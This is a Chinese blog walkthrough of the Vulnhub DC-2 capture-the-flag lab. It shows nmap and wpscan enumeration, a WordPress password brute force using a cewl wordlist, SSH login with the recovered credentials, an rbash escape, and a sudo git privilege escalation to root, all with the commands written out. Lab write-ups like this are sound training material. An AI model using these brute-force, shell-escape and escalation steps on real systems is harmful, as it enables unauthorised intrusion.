freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Vulnhub靶机 DC-2 打靶 渗透详细过程
2024-04-16 00:24:03

VulHub靶机 DC-2打靶实战

一、将靶机导入到虚拟机当中

靶机地址:

https://www.vulnhub.com/entry/dc-2,311/

image-20240413222236297

二、攻击方式

主机发现

使用arp-scan命令探测主机,或者使用nmap命令也可

image-20240413222052488

端口扫描

nmap -p- 10.1.2.154

image-20240413224851067

服务探针

image-20240413224919104

image-20240413225409159

开发80端口,访问一下web服务界面

爆破目录

dirsearch -u http://dc-2 -i 200

发现登录界面

image-20240413231739922

image-20240413231805112

web渗透

来到web界面首页得到flag提示信息

image-20240413225525231

翻译:

你通常的词汇表可能不会起作用,所以,也许你只需要保持冷静(cewl)。
密码越多越好,但有时候你就是赢不了所有密码。
以一个登录查看下一个标志。
如果找不到,请以另一个身份登录。

信息收集

发现此web服务的一些信息和采用的CMS

image-20240413225803367

发现网站采用WordPress CMS ,那么来到kali端使用wpscan工具进行对网站扫描

扫描探针

wpscan --url http://dc-2 -e u

得到三个登录用户,将其保存到记事本当中,跟前前面的flag提示,使用cewl命令针对网站来生成密码,并保存到记事本当中,后面进行爆破

Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,你可以把字典用到类似John the Ripper这样的密码破解工具中。除此之外,Cewl还提供了命令行工具。

image-20240413230014363

使用cewl命令行工具,对网站进行生成字典,保存到passwd.txt当中

cewl http://dc-2 -w passwd.txt

image-20240413231205409

登录密码爆破

使用wpscan工具进行爆破

wpscan --url http://dc-3 -U user.txt -P passwd.txt 

image-20240413231314544

开始爆破,成功爆破出Jerry和tom的密码,等了web后台

image-20240413231352974

image-20240413231451256

用户名:tom
密码:parturient

用户名:jerry
密码:adipiscing

拿到用户名和密码登录网站后台,找到flag2

image-20240413233904659

image-20240413233848623

翻译:

如果您无法利用 WordPress 并走捷径,还有另一种方法。

希望你找到了另一个切入点。

SSH远程登录

这里没有什么利用点。开始的端口扫描,发现此将ssh端口改为7744,那么我们尝试将上面得到的用户名和密码再次进行SSH远程登录尝试

ssh tom@10.1.2.154 -p 7744
ssh jerry@10.1.2.154 -p 7744

发现tom可以远程登录成功,发现当前目录下有flag3.txt

没有cat命令,可以尝试其他可以产看文件的命令

image-20240413234231307

内容:

image-20240413234310700

翻译:

可怜的老汤姆总是追着杰瑞跑。也许他应该为自己造成的压力承担责任。(su命令提示)

rbash

可看到出现su命令提示,我们尝试切换到Jerry用户,发现没有su ,我们需要rbash逃逸

image-20240413234527442

BASH_CMDS[su]=/bin/sh

su

export PATH=$PATH:/bin/

export PATH=$PATH:/usr/bin/

su jerry
输入jerry的密码,前面收集爆破到的密码

image-20240414000250524

成功切换到jerry用户处,回到jerry的家目录,找到flag4.txt查看即可

image-20240414000403765

翻译:

很高兴看到你已经走了这么远-但你还没回家。你仍然需要得到最后的旗帜(唯一真正重要的旗帜!!!)这里没有提示-你现在是在你自己。:-)
走吧-离开这里!!!!(git)

提权

使用git提权即可

sudo git branch --help config
!/bin/sh

image-20240414000852688

well done!
恭喜你啊!!!

文章不妥之处,欢迎批评指正!

# 漏洞 # 渗透测试 # web安全 # 漏洞分析 # 网络安全技术
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录